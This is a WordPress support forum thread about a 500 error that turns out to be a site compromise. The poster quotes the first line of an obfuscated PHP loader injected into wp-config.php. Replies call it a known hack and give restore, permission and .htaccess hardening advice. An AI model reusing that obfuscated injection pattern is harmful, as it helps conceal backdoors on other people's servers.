Title: 500 server error
Last modified: August 21, 2016

---

# 500 server error

 *  [SickSquirrel](https://wordpress.org/support/users/sicksquirrel/)
 * (@sicksquirrel)
 * [12 years, 7 months ago](https://wordpress.org/support/topic/500-server-error-17/)
 * Checking script in one site said it was a 500 error. Tried to get to it, the 
   admin, page is blank on iPad. Site is 500.
 * I went in via FTP and see wp-config.php changed today. I remember logging in 
   earlier and a script said to fix that file, so I said yes. Due to memory issues,
   I can’t remember which script. I can’t get in to see if it was a plugin or not.
   WAIT I do remember looking at WP All In One Security but don’t remember which
   asked for change. I know I went to Filesystem Security if that helps. One of 
   the tabs said to upgrade/ WAIT I remember. Chmod was 0666 and it said it needed
   0644 or vice versa.
 * Anyway, the config file begins with the following, then about 200 lines of letters/
   numbers, at least that way in iPad. I can’t check my Windows laptop
 *     ```
       <?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework("",
       ```
   
 * Don’t know if that code was added today but chmod changed.

Viewing 14 replies - 1 through 14 (of 14 total)

 *  Moderator [t-p](https://wordpress.org/support/users/t-p/)
 * (@t-p)
 * [12 years, 7 months ago](https://wordpress.org/support/topic/500-server-error-17/#post-4170341)
 * Error 500 ISE is very generic and can be caused by numerous underlying issues.
   Here are some thing you can try to solve it:
    – Your first step should be checking
   your site’s error logs for a more specific error message. If you need help locating
   them, ask your hosting provider to help you with that. – check with your host
   if the domain name is configured properly to point to public_html folder – It
   may indicate .htaccess issue. Regenerate .htaccess, and be sure the encoding 
   in your text editor is Unicode No BOM – It may also indicate a problem with the
   configuration on the server. Usually your hosting company tech support can help.–
   it could be problem with the plugins, try [resetting the plugins folder](http://codex.wordpress.org/FAQ_Troubleshooting#How_to_deactivate_all_plugins_when_not_able_to_access_the_administrative_menus.3F)
   by FTP or phpMyAdmin. – it could be a problem with the theme. Momentarily, try
   switching to the default WordPress theme via FTP or whatever file management 
   application your host provides by renaming your current theme to rule out any
   theme specific issue. – If the above troubleshooting steps fail to resolve the
   issue, try manually re-uploading all files and folders EXCEPT the wp-config.php
   file and the /wp-content/ directory from a fresh download of WordPress. Make 
   sure that you delete the old copies of files & folder before uploading the new
   ones. Read the [Manual Update ](http://codex.wordpress.org/Updating_WordPress#Manual_Update)
   directions first!
 *  Thread Starter [SickSquirrel](https://wordpress.org/support/users/sicksquirrel/)
 * (@sicksquirrel)
 * [12 years, 7 months ago](https://wordpress.org/support/topic/500-server-error-17/#post-4170361)
 * But the only file changed was config. The paste showed something was wrong. Plus
 * 14:19:15 2013] [error] [client *******] PHP Parse error: syntax error, unexpected‘
   <‘ in /………………………./user_dir/site/wp-config.php on line 1
 *  [Scriptrunner (Doug Sparling)](https://wordpress.org/support/users/scriptrunner/)
 * (@scriptrunner)
 * [12 years, 7 months ago](https://wordpress.org/support/topic/500-server-error-17/#post-4170362)
 * That’s an exploit/hack on WordPress and has effected your site. You’re going 
   to need to do a restore from a backup.
 * See Codex: [FAQ My site was hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
 * [Fix for $zend_framework WordPress Hack](http://www.perfilev.com/post/52851047670/fix-for-zend-framework-wordpress-hack)
 * [$zend_framework WordPress Hacks](http://www.justbeck.com/zend_framework-wordpress-hacks/)
 * Or just Google “wordpress zend framework hack”
 *  Thread Starter [SickSquirrel](https://wordpress.org/support/users/sicksquirrel/)
 * (@sicksquirrel)
 * [12 years, 7 months ago](https://wordpress.org/support/topic/500-server-error-17/#post-4170375)
 * Thanks. How did they get to it to exploit? What is the exploit? Any other files
   they old have changed? I have security precautions in place …
 *  [leejosepho](https://wordpress.org/support/users/leejosepho/)
 * (@leejosepho)
 * [12 years, 7 months ago](https://wordpress.org/support/topic/500-server-error-17/#post-4170377)
 * > How did they get to it to exploit?
 * As suggested by Bulletproof Security, permissions for `wp-config.php` should 
   be 0400 and left there until *you* might make a change.
 *     ```
       htaccess 0404
       wp-config.php 0400
       index.php 0400
       wp-blog-header.php 0400
       root folder 0705
       wp-admin/ 0705
       wp-includes/ 0705
       wp-content/ 0705
       ```
   
 *  Thread Starter [SickSquirrel](https://wordpress.org/support/users/sicksquirrel/)
 * (@sicksquirrel)
 * [12 years, 7 months ago](https://wordpress.org/support/topic/500-server-error-17/#post-4170378)
 * Thanks. Will change all once I’m restored. Will do it on all other sites, too
 *  Thread Starter [SickSquirrel](https://wordpress.org/support/users/sicksquirrel/)
 * (@sicksquirrel)
 * [12 years, 7 months ago](https://wordpress.org/support/topic/500-server-error-17/#post-4170380)
 * My FTP program (FTP Pro To Go as I’m on iPad right now; tomorrow Windows) allows
   3 numbers. Cn you give it as Owner Group World?
 *  [leejosepho](https://wordpress.org/support/users/leejosepho/)
 * (@leejosepho)
 * [12 years, 7 months ago](https://wordpress.org/support/topic/500-server-error-17/#post-4170384)
 * My FileZilla is the same, so just drop the preceding zero.
 *  Thread Starter [SickSquirrel](https://wordpress.org/support/users/sicksquirrel/)
 * (@sicksquirrel)
 * [12 years, 7 months ago](https://wordpress.org/support/topic/500-server-error-17/#post-4170403)
 * Ah, thank you. Will try it later as FTP is busy downloading site.
 *  [leejosepho](https://wordpress.org/support/users/leejosepho/)
 * (@leejosepho)
 * [12 years, 7 months ago](https://wordpress.org/support/topic/500-server-error-17/#post-4170406)
 * Ask your host about switching to SFTP since FTP sends your credentials and whatever
   else out in plain text.
 *  Thread Starter [SickSquirrel](https://wordpress.org/support/users/sicksquirrel/)
 * (@sicksquirrel)
 * [12 years, 7 months ago](https://wordpress.org/support/topic/500-server-error-17/#post-4170432)
 * Host says no. “Pam, unfortunately SFTP isn’t supported at this time as it requires
   a shell/ssh connection to tunnel through and we do not allow SSH due to security
   reasons.”
 * I used to use SSH to reach my own server years ago but I had full control and
   a server admin who was a security whiz. Now I have to bend to their rules.
 * I did set chmod as you directed on all sites. My only concern is your statement
   abut changing it back. What needs to be changed and to what do I change it to?
 *  [leejosepho](https://wordpress.org/support/users/leejosepho/)
 * (@leejosepho)
 * [12 years, 7 months ago](https://wordpress.org/support/topic/500-server-error-17/#post-4170434)
 * If you are asking about “permissions for `wp-config.php` should be 0400 and left
   there until *you* might make a change”, I am saying to never open those permissions
   for any script unless it is something like the Sucuri plugin resetting your keys
   after a hack. Also, in the morning (at my other machine) I will post a few lines
   of code to add at the top of htaccess to “Deny All” in relation to `wp-config.
   php`.
 *  Thread Starter [SickSquirrel](https://wordpress.org/support/users/sicksquirrel/)
 * (@sicksquirrel)
 * [12 years, 7 months ago](https://wordpress.org/support/topic/500-server-error-17/#post-4170437)
 * Thanks. So the config file should never need tweaking so I can leave it set as
   is. I have two more sites to do, I did notice a couple of sites gave a 550 error
   when putting .htaccess to 404. One allowed it after but the rest said no. I only
   did the main file, not each folder.
 * 550 CHMOD SITE FAILED
 *  [leejosepho](https://wordpress.org/support/users/leejosepho/)
 * (@leejosepho)
 * [12 years, 7 months ago](https://wordpress.org/support/topic/500-server-error-17/#post-4170453)
 * > I did notice a couple of sites gave a 550 error when putting .htaccess to 404.
   > One allowed it after but the rest said no. I only did the main file, not each
   > folder.
 * That kind of thing is beyond my knowledge, but I would be finding out exactly
   why a higher setting seems to be needed. To the best of my knowledge, that file
   does not need to be changed during the course of normal operation.
 * Here is the piece of code I had mentioned:
 *     ```
       ## add at top of htaccess
       ## note: also go set wp-config.php permissions to 0400
       # deny wp-config.php
       <files wp-config.php>
       order allow,deny
       deny from all
       </files>
       ```
   
 * Then, this one keeps anyone and everyone from reading `.htaccess` and any other“
   dot” file with no name (such as a `.pwrd` file):
 *     ```
       # deny .htaccess .htpasswd etc.
       RedirectMatch 403 /\..*$
       ```
   

Viewing 14 replies - 1 through 14 (of 14 total)

The topic ‘500 server error’ is closed to new replies.

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 14 replies
 * 4 participants
 * Last reply from: [leejosepho](https://wordpress.org/support/users/leejosepho/)
 * Last activity: [12 years, 7 months ago](https://wordpress.org/support/topic/500-server-error-17/#post-4170453)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics